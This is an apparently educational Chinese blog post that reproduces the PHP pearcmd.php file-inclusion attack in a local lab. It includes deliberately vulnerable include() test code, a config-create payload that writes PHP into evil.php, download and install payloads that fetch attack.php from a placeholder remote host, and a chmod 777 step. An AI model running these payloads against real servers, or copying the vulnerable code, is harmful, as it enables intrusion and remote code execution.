<!--
	作者：Sariay
	时间：2018-08-26
	描述：There may be a bug, but don't worry, Qiling(器灵) says that it can work normally! aha!
-->
<!DOCTYPE html>
<html class="html-loading">
		

<head>
	<meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <title>
    
      pearcmd漏洞演示 | Su@sU的世界
    
  </title>
  <meta name="author" content="Su@sU">
  <meta name="keywords" content="web 游戏" />
  <meta name="description" content="一个什么都感兴趣的人的胡思乱想" />
	<!-- favicon -->
  <link rel="shortcut icon" href="/img/favicon.ico">

  <!-- css -->
  
<link rel="stylesheet" href="/css/Annie.css">

  
  <!-- jquery -->
	
<script src="/plugin/jquery/jquery.min.js"></script>


<script>
    const CONFIG_BGIMAGE = {
      mode: 'normal',
      normalSrc: '/img/header-bg.jpg',
      randomYouMax: 110,
      randomYouSrc: 'https://sariay.github.io/Random-img/',
	  randomOtherSrc: 'https://api.berryapi.net/?service=App.Bing.Images&day=-0',
	  preloaderEnable: true
    }
	
    const CONFIG_LEACLOUD_COUNT = {
      enable: false,
	  appId: 'AU8...',
	  appKey: '4cU...',
	  serverURLs: 'http' || ' '
    }
  </script>
<meta name="generator" content="Hexo 8.1.1"></head>
	<body>
		<!-- Preloader -->

	<div id="preloader">
		<div class="pre-container">
			
				<div class="spinner">
					<div class="double-bounce1"></div>
					<div class="double-bounce2"></div>
				</div>
						
		</div>
	</div>


<!-- header -->
<header class="fixbackground bg-pan-br">
	<div class="mask">
		<!-- motto -->
		<div class="h-body">	
			
				<div class="motto text-shadow-pop-left">
					<p class="content" id="motto-content">获取中...</p>
					<p>-<p>
					<p class="author" id="motto-author">Just a minute...</p>
				</div>
			
		</div>
		
		<!-- others: such as time... -->			
		<div class="h-footer">
			<a href="javascript:;" id="read-more" class="scroll-down">
				<span class="icon-anchor1 animation-scroll-down"></span>
			</a>
		</div>
	</div>
</header>

<div id="navigation-hide">
	<!-- Progress bar -->
	<div id="progress-bar"></div>

	<!-- Progress percent -->
	<div id="progress-percentage"><span>0.0%</span></div>

	<div class="toc-switch"><span class="switch-button">目录</span></div>

	<!-- Page title -->
	<p>
		
			「pearcmd漏洞演示」
		
	</p>

	
	

	<!-- Nav trigger for navigation-H-->
	<a class="nav-trigger"><span></span></a>
</div>

<!-- Navigation in div(id="navigation-H") -->
<nav class="nav-container" id="cd-nav">
	<div class="nav-header">
		<span class="logo"> 
			<img src="/img/logo.png">
		</span>
		<a href="javascript:;" class="nav-close"></a>
	</div>
	
	<div class="nav-body">
		<ul id="global-nav">
	
		<li class="menu-home">
			<a href="/" class="menu-item-home" target="_blank">主页</a>
		</li>
		
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive" target="_blank">归档</a>
		</li>
		
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories" target="_blank">分类</a>
		</li>
		
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags" target="_blank">标签</a>
		</li>
		
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about" target="_blank">关于</a>
		</li>
		
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery" target="_blank">相册</a>
		</li>
		
	

	
		<li class="menu-search">
			<a href="javascript:;" class="popup-trigger">搜索</a>
		</li>
	
</ul>
	</div>
	
	<div class="nav-footer">
		<ul id="global-social">
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-one"><span class="path1"></span><span class="path2"></span></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-zhihu"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-github"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-sina-weibo "></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-pinterest2"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-instagram"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-twitter"></span>
			</a>
		</li>
	
		<li>
			<a href="/atom.xml" target="_blank">
				<span class="icon-rss"></span>
			</a>
		</li>
			
</ul>

	</div>
</nav>
			
		<!--main-->
		<main>
			<!--
	时间：2018-11-17
	描述：
		插件名称：katelog.min.js
		插件作者：KELEN
		插件来源: https://github.com/KELEN/katelog
-->

	
		<div class="layout-toc">
			<div id="layout-toc">
				<div class="k-catelog-list" id="catelog-list" data-title="文章目录"></div>
			</div>
		</div>

		
<script src="/plugin/toc/katelog.min.js"></script>


		
	 

<div class="layout-post">
	<div id="layout-post">
		<div class="article-title">
			
	<a href="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" itemprop="url">
		pearcmd漏洞演示
	</a>

		</div>

		<div class="article-meta">
			<span>
				<i class="icon-calendar1"></i>
				
				




	更新于

	<a href="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" itemprop="url">
		<time datetime="2026-03-12T04:00:00.000Z" itemprop="dateUpdated">
	  		2026-06-21
	  </time>
	</a> 



			</span>
			<span>
						
			</span>
			
			



		</div>

		<div class="article-content" id="article-content">
			<h2 id="1register-argc-argv"><a href="#1register-argc-argv" class="headerlink" title="1register_argc_argv"></a>1register_argc_argv</h2><h3 id="性质"><a href="#性质" class="headerlink" title="性质"></a>性质</h3><p>这是PHP中的一个配置项 用于决定是否在脚本中声明<code>_$argc_ 和 _$argv_ </code>变量<br>这两个变量在命令行模式下是十分重要的</p>
<ul>
<li><code>$argc</code>：表示传递给脚本的参数数量</li>
<li><code>$argv</code>:这是一个数组 包含传递给脚本的参数值<br>它的工作原理是将命令行参数传递给PHP脚本 当脚本运行时这些参数被解析为 <code>$argc</code> 和 <code>$argv</code> 变量</li>
</ul>
<h3 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h3><p>我们可以构造下列代码进行一个测试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">var_dump($_SERVER[&#x27;argv&#x27;]);</span><br><span class="line"></span><br><span class="line">$a = $_SERVER[&#x27;argv&#x27;];</span><br><span class="line"></span><br><span class="line">$a[0]($a[1]);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>我们传入?ssss+sadasdsad<br>可以看到在这个页面下 作为分割符号的是加号 加号前后会被分割成不同的值</p>
<img src="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/test.png" class="" title="test">



<h3 id="测试时候遇到的小问题"><a href="#测试时候遇到的小问题" class="headerlink" title="测试时候遇到的小问题"></a>测试时候遇到的小问题</h3><p>某些朋友使用小皮面板搭建本地测试环境的时候很可能会发现一直报NULL</p>
<img src="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/null.png" class="" title="null">

<p>这是由于在PHP中<strong>register_argc_argv</strong>这个配置默认是off 解决方式也很简单 找到php.ini这个文件夹将其修改即可（D:\phpstudy_pro\Extensions\php\php7.3.4nts博主的php.ini存在路径是这个 大家可以参考一下）记得改完之后重启一下小皮面板的服务<br>之后我们还要注意 常用的ls是linux下单命令 在windows下无法使用 我们可以使用dir</p>
<img src="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/dir.png" class="" title="dir">
<p>还有个很有意思的事情 我在test.php（也就是当前页面）的同一文件夹下创建了一个含有自制flag的flag.txt<br>此时使用这样的payload<br><code>?system+sort flag.txt</code>是无法查看到正确的内容的<br>按照逻辑上来说这应该是正确的但是在实际操作中我们明显看到不可行 往往这是windows命令行地下有一些环境变量或者执行上下文的问题<br>这时候我们应该考虑 不走操作系统的途径 直接通过PHP去读取flag.txt<br>我们可以尝试?show_source+flag.txt或者?highlight_file+flag.txt这两种只需要一个参数就能直接读取并且输出文件内容的函数 就能成功查看到flag ![[屏幕截图 2026-03-10 192341.png]]<br>挺有意思 可以有一些启发</p>
<h2 id="Pearcmd"><a href="#Pearcmd" class="headerlink" title="Pearcmd"></a>Pearcmd</h2><p>我们要了解 pearcmd是PHP的一个命令行工具 用以管理拓展<br>根据p神的文章我们可以分析一下pearmd.php <a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html">Docker PHP裸文件本地包含综述 | 离别歌</a></p>
<p>我们在PHP源码中可以看到这样的逻辑：</p>
<figure class="highlight plaintext"><figcaption><span>zend_bool php_auto_globals_create_server(zend_string *name)</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    if (PG(variables_order) &amp;&amp; (strchr(PG(variables_order),&#x27;S&#x27;) || strchr(PG(variables_order),&#x27;s&#x27;))) &#123;</span><br><span class="line">        php_register_server_variables();</span><br><span class="line"></span><br><span class="line">        if (PG(register_argc_argv)) &#123;</span><br><span class="line">            if (SG(request_info).argc) &#123;</span><br><span class="line">                zval *argc, *argv;</span><br><span class="line"></span><br><span class="line">                if ((argc = zend_hash_find_ex_ind(&amp;EG(symbol_table), ZSTR_KNOWN(ZEND_STR_ARGC), 1)) != NULL &amp;&amp;</span><br><span class="line">                    (argv = zend_hash_find_ex_ind(&amp;EG(symbol_table), ZSTR_KNOWN(ZEND_STR_ARGV), 1)) != NULL) &#123;</span><br><span class="line">                    Z_ADDREF_P(argv);</span><br><span class="line">                    zend_hash_update(Z_ARRVAL(PG(http_globals)[TRACK_VARS_SERVER]), ZSTR_KNOWN(ZEND_STR_ARGV), argv);</span><br><span class="line">                    zend_hash_update(Z_ARRVAL(PG(http_globals)[TRACK_VARS_SERVER]), ZSTR_KNOWN(ZEND_STR_ARGC), argc);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125; else &#123;</span><br><span class="line">                php_build_argv(SG(request_info).query_string, &amp;PG(http_globals)[TRACK_VARS_SERVER]);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        zval_ptr_dtor_nogc(&amp;PG(http_globals)[TRACK_VARS_SERVER]);</span><br><span class="line">        array_init(&amp;PG(http_globals)[TRACK_VARS_SERVER]);</span><br><span class="line">    &#125;</span><br><span class="line">    ...</span><br></pre></td></tr></table></figure>
<p>根据p神的分析 我们可以知道第一个if语句判断<code>variables_order</code>中是否有<code>S</code>，即<code>$_SERVER</code>变量；第二个if语句判断是否开启register_argc_argv，第三个if语句判断是否有request_info.argc存在，如果不存在，其执行的是这条语句：</p>
<p><code>php_build_argv(SG(request_info).query_string, &amp;PG(http_globals)[TRACK_VARS_SERVER]);</code></p>
<p>根据p神的文章我们知道<br><code>SG(request_info).query_string</code>会将http数据包中的query_string作为argv的值</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">public static function readPHPArgv() </span><br><span class="line">&#123; global $argv; </span><br><span class="line">if (!is_array($argv))</span><br><span class="line">&#123; if (!@is_array($_SERVER[&#x27;argv&#x27;])) </span><br><span class="line">&#123; if (!@is_array($GLOBALS[&#x27;HTTP_SERVER_VARS&#x27;][&#x27;argv&#x27;])) </span><br><span class="line">&#123; $msg = &quot;Could not read cmd args (register_argc_argv=Off?)&quot;;</span><br><span class="line"> return PEAR::raiseError(&quot;Console_Getopt: &quot; . $msg); &#125; </span><br><span class="line"> return $GLOBALS[&#x27;HTTP_SERVER_VARS&#x27;][&#x27;argv&#x27;]; &#125; </span><br><span class="line"> return $_SERVER[&#x27;argv&#x27;]; &#125; </span><br><span class="line"> return $argv; &#125;</span><br></pre></td></tr></table></figure>

<p>在p神的分析中我们可以看到<br><code>在这一段代码中我们看到  pear会先尝试$argv，如果不存在再尝试$_SERVER[&#39;argv&#39;]，后者我们可通过query-string控制。也就是说，我们通过Web访问了pear命令行的功能，且能够控制命令行的参数。</code><br>并且在p神的文章中我们发现他给出了一个参数表</p>
<img src="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/cmd.png" class="" title="cmd">
<p>经过博主的理解 这里面比较重要并且能被我们所利用的实际上也就三个命令</p>
<ol>
<li>config-create</li>
<li>download</li>
<li>install<br>接下来我将逐一为大家讲解</li>
</ol>
<h3 id="config-create的利用"><a href="#config-create的利用" class="headerlink" title="config-create的利用"></a>config-create的利用</h3><p>我们看到config首先想到的肯定是配置文件 同样的 这个其实也就是pearcmd中的这么一个控制配置文件的命令<br>这个命令主要有两个参数 第一个参数是pearcmd.php文件的绝对路径 第二个参数是写入配置文件的路径 使用这个命令之后会把第一个路径产生点配置文件写入第二个路径的文件之中<br>诸如这样<br><code>pear config-create /usr/local/lib/php/pearcmd.php /var/www/html/evil.php</code><br>但是有意思的是 <strong>第一个参数并不会检查是否存在这个路径</strong> 也就是说你可以随意编造一个恶意代码 之后加上一个<code>/</code>假装他是一个合法的路径 之后将这个恶意代码写入目标文件之中</p>
<p>那么现在我们的攻击思路就比较明确了 </p>
<ol>
<li>包含pearcmd.php文件</li>
<li>使用config.create这个命令 在第一个参数之中传入恶意代码 在第二个传入已知的目标靶机的文件中</li>
<li>恶意代码被写入到了目标文件</li>
<li>包含目标文件 恶意代码被触发<br>我们使用kali来进行一下实验<br>首先得先安装一下pearcmd这个组件包</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">sudo apt update</span><br><span class="line">sudo apt install apache2 php libapache2-mod-php php-xml php-cli//安装Apache PHP以及所需拓展</span><br><span class="line"></span><br><span class="line">sudo apt install php-pear//安装pear组件</span><br><span class="line"></span><br><span class="line">sudo vim /etc/php/*/apache2/php.ini</span><br><span class="line">register_argc_argv = On//打开php.ini之后将这个改成On</span><br><span class="line"></span><br><span class="line">sudo systemctl restart apache2//重启Apache服务</span><br></pre></td></tr></table></figure>
<p>至此 我们所需要的环境搭建完成<br>接下来我们随便创建一个存在文件包含漏洞的文件即可<br><code>sudo vim /var/www/html/test.php</code><br>文件内容如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">$file=$_GET[&#x27;file&#x27;];</span><br><span class="line">include($file);</span><br><span class="line">var_dump($_SERVER[&#x27;argv&#x27;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>那么接下来我们在这个文件包含页面之中输入以下payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl &quot;http://127.0.0.1/test.php?file=/usr/share/php/pearcmd.php&amp;+config-create+/&lt;?=phpinfo()?&gt;+/var/www/html/evil.php</span><br></pre></td></tr></table></figure>

<p>写入成功的时候应该会返回这样的图片</p>
<img src="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/evil.png" class="" title="evil">
<p>此时我们打开evil .php可以看到里面被传入了一串反序列化内容</p>
<img src="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/serialize.png" class="" title="serialize">
<p>接下来我们只需要再包含这个evil.php即可触发恶意代码</p>
<img src="/2026/03/12/pearcmd%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/php.png" class="" title="php">
<p>我们对这个payload做出解释</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=/usr/share/php/pearcmd.php&amp;+config-create+/&lt;?=phpinfo()?&gt;+/var/www/html/evil.php</span><br></pre></td></tr></table></figure>
<ol>
<li><strong>file&#x3D;&#x2F;usr&#x2F;share&#x2F;php&#x2F;pearcmd.php</strong>：这一段内容是再包含pearcmd这个文件————&gt;传参给file变量</li>
<li><strong>&amp;+config-create+</strong>：这一段是调用pearcmd.php中的config-create这个命令————&gt;传参给argv这个变量0</li>
<li><code>/&lt;?=phpinfo()?&gt;</code>:这一段是传入的恶意代码 再前面加入斜杠假装自己是一个路径（pear的源码逻辑是把第一个参数当成一个普通的文本字符串保存在内存里，根本就没有有调用is_dir()或者file_exists()去硬盘上验证这个目录到底存不存在）</li>
<li><strong>+&#x2F;var&#x2F;www&#x2F;html&#x2F;evil.php</strong>：这是我们的目标写入文件</li>
<li><strong>注意</strong>：在代码中的不同参数使用<code>&amp;</code>符号分割 在对argv参数的传参之中使用<code>+</code>符号分割<br>综上 就完成了整个pearcmd中config-create的漏洞复现</li>
</ol>
<p>ps:本次复现是在kali之中实现的 所有环境都是linux环境 如果想使用windows环境的话也可以</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip addr show//通过这个指令查看你kali的ip地址 在物理机中访问将127.0.0.1改成你在kali中找到的ip就行 为了安全起见 不做图片展示</span><br></pre></td></tr></table></figure>
<p>还有可能会遇到的问题是权限问题 因为&#x2F;var&#x2F;www&#x2F;html是一个比较重要的目录 很多时候我们是没有对这个目录的写入权限的 这时候在本地测试的时候我们可以短暂的对这个目录进行提权 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo chmod 777 /var/www/html  //将/var/www/html这个目录的权限打开</span><br><span class="line"></span><br><span class="line">ls -ld /var/www/html  //drwxrwxrwx显示这个的时候表示所有用户都可以读写执行</span><br></pre></td></tr></table></figure>
<h3 id="download的利用"><a href="#download的利用" class="headerlink" title="download的利用"></a>download的利用</h3><p>这个命令的作用是远程下载文件<br>这个命令只有一个参数 就是想要下载的文件的路径<br>那么在实际应用之中我们就可以</p>
<ol>
<li>在自己本地的kali之中编写个给含有恶意代码的文件 </li>
<li>使用download这个命令将其下载到靶机之下</li>
<li>包含此时已经存在于靶机之中的恶意文件触发恶意代码</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=/usr/share/php/pearcmd.php&amp;+download+http://xxx.xxx.xxx.xx:xxxx/xxxx/attack.php</span><br></pre></td></tr></table></figure>
<p>类似的payload如上所示<br>这个命令会把我们的恶意代码存储到靶机的&#x2F;var&#x2F;www&#x2F;html目录或者&#x2F;tmp&#x2F;pear&#x2F;download目录之下</p>
<h3 id="install的利用"><a href="#install的利用" class="headerlink" title="install的利用"></a>install的利用</h3><p>这个和download命令并无区别 只不过是会吧文件保存到&#x2F;tmp&#x2F;pear&#x2F;download目录之下<br>类似的payload如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=/usr/share/php/pearcmd.php&amp;+install+http://xxx.xxx.xxx.xx:xxxx/xxxx/attack.php</span><br></pre></td></tr></table></figure>


<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>至此我们对pearcmd文件包含这个比较新颖的文件包含知识有了一定的了解 其实本质上 这个pearcmd.php文件其实就是一个命令行工具包 我们在使用他进行文件包含的时候就是了他其中的工具 这些工具在传参上可能存在利用点 这样也就形成了我们的攻击</p>
<p><strong>参考文章</strong>：<br><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html">Docker PHP裸文件本地包含综述 | 离别歌</a></p>
	
		</div>
		
		<div id="current-post-cover" data-scr="/images/covers/huchenghe.jpg"></div>

		<!-- relate post, comment...-->
		<div class="investment-container">
			<div class="investment-header">
				<div class="investment-title-1">
					<div class="on">相关文章</div>
					<div>评论</div>
					<div>分享</div>
				</div>
				<div class="investment-title-2">	            
					
	<span>
		<a id="totop-post-page">返回顶部</a>
		
			<a href="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="Phar反序列化漏洞演示" rel="prev">
				&laquo;上一篇
			</a>
		
		
			<a href="/2026/03/10/session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95/" title="session反序列化漏洞测试" rel="next">
				下一篇&raquo;
			</a>
			
	</span>


      		
				</div>	
			</div>
			
			<div class="investment-content">
				<div class="investment-content-list">
					

<div class="relate-post">
	
		<ul>
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/06/30/%E5%8A%A8%E6%80%81%E4%BB%A3%E7%90%86/" title="用租房视角学习动态代理">
								用租房视角学习动态代理			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								六月 30日, 2026				
							</p>
							<p class="relate-post-content">
								关于这一部分的知识点 我们先从静态代理说起
静态代理什么是代理？ 代理就是：不操作目标对象而是通过一个中间人（代理）来间接操作最常见的现实例子就是租房问题：你要租房子 不需要直接找到房东 而是通过租房中介 中介帮你去和房东沟通  那么...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/06/30/%E5%8A%A8%E6%80%81%E4%BB%A3%E7%90%86/" title="用租房视角学习动态代理">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/dali.jpg" alt="用租房视角学习动态代理"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/06/30/%E5%8A%A8%E6%80%81%E5%8A%A0%E8%BD%BD%E5%AD%97%E8%8A%82%E7%A0%81/" title="动态加载字节码">
								动态加载字节码			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								六月 30日, 2026				
							</p>
							<p class="relate-post-content">
								动态加载字节码是一种让JVM可以接收由程序在运行时动态产生的字节数组并将其装在的能力 本义是让程序变得更加灵活 但是也产生了一定的安全问题
核心方法在java.lang.ClassLoader类中有一个方法
1protected fi...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/06/30/%E5%8A%A8%E6%80%81%E5%8A%A0%E8%BD%BD%E5%AD%97%E8%8A%82%E7%A0%81/" title="动态加载字节码">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/huqiu.jpg" alt="动态加载字节码"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/06/30/%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/" title="类加载机制漫谈">
								类加载机制漫谈			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								六月 30日, 2026				
							</p>
							<p class="relate-post-content">
								解释java字节码为什么需要编译成class文件我们首先要理解JVMjava是是一种混合型语言有编译的步骤也有解释步骤我们编写的java文件需要被编译成class文件之后才能被JVM运行
什么是class文件传统编译型语言（C C++...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/06/30/%E7%B1%BB%E5%8A%A0%E8%BD%BD%E6%9C%BA%E5%88%B6/" title="类加载机制漫谈">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/yulong.jpg" alt="类加载机制漫谈"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/06/29/%E5%8F%8D%E5%B0%84/" title="反射随笔">
								反射随笔			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								六月 29日, 2026				
							</p>
							<p class="relate-post-content">
								反射概念在java之中 万物都是对象 包括“类本身也是一个对象”（属于java.lang.Class类的对象）
反射的本质就是在程序运行期间 通过操控这个Class对象 反向解析和操控它所代表的哪个类里面的内容（构造器，属性，方法）
...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/06/29/%E5%8F%8D%E5%B0%84/" title="反射随笔">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/xuanwuhu.jpg" alt="反射随笔"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/06/21/LangChain%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" title="LangChain反序列化">
								LangChain反序列化			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								六月 21日, 2026				
							</p>
							<p class="relate-post-content">
								最近在打SCTF的时候遇到一个LangChain反序列化的题目  比较新颖 于是想着学习一下
LangChain介绍LangChain是一个用于构建大语言模型应用的开源框架 通过这个可以把常用的组件抽象成可串联的链（Chain）举个例...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/06/21/LangChain%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" title="LangChain反序列化">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/pingjianglu.jpg" alt="LangChain反序列化"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/04/19/filter-chain%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="filter-chain漏洞演示">
								filter-chain漏洞演示			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								四月 19日, 2026				
							</p>
							<p class="relate-post-content">
								这个漏洞链被称为CNEXT 由安全员Charles Fol披露
核心思想是利用系统内置的看似无害的模块（流过滤器）的巧妙组合 在受限的web环境之中执行命令
原理讲解filter协议对于filter伪协议 我们肯定都不陌生这个伪协议允...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/04/19/filter-chain%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="filter-chain漏洞演示">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/daliyuese.jpg" alt="filter-chain漏洞演示"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/04/19/%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/" title="死亡绕过">
								死亡绕过			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								四月 19日, 2026				
							</p>
							<p class="relate-post-content">
								前言以及环境介绍本文是对p神文章谈一谈php:&#x2F;&#x2F;filter的妙用 | 离别歌知识点的学习
本文主要介绍使用filter伪协议进行死亡绕过的三种方式
测试环境：小皮面板测试代码：exit.php
12345&lt...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/04/19/%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/" title="死亡绕过">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/shanghai.jpg" alt="死亡绕过"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="Phar反序列化漏洞演示">
								Phar反序列化漏洞演示			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								三月 13日, 2026				
							</p>
							<p class="relate-post-content">
								前言我们在之前学习的反序列化漏洞 无一不是利用了unserialize()这个函数 但是我们没有去考虑 假设此时的题目并没有给我们这个函数 我们还能否实现反序列化呢
其实是可以的 在2018年的BlackHat 大会上 Sam Tho...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2026/03/13/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" title="Phar反序列化漏洞演示">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/images/covers/erhaibian.jpg" alt="Phar反序列化漏洞演示"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/03/10/session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95/" title="session反序列化漏洞测试">
								session反序列化漏洞测试			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								三月 10日, 2026				
							</p>
							<p class="relate-post-content">
								前置知识首先我们要了解session是什么
